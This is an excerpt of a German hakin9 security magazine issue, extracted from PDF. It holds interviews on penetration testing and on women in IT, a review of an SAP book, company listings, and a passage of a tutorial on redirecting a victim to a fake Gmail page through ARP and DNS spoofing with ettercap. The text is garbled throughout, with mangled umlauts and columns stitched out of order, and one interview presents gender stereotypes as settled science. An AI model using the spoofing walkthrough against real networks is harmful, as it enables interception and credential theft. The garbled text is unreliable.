Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
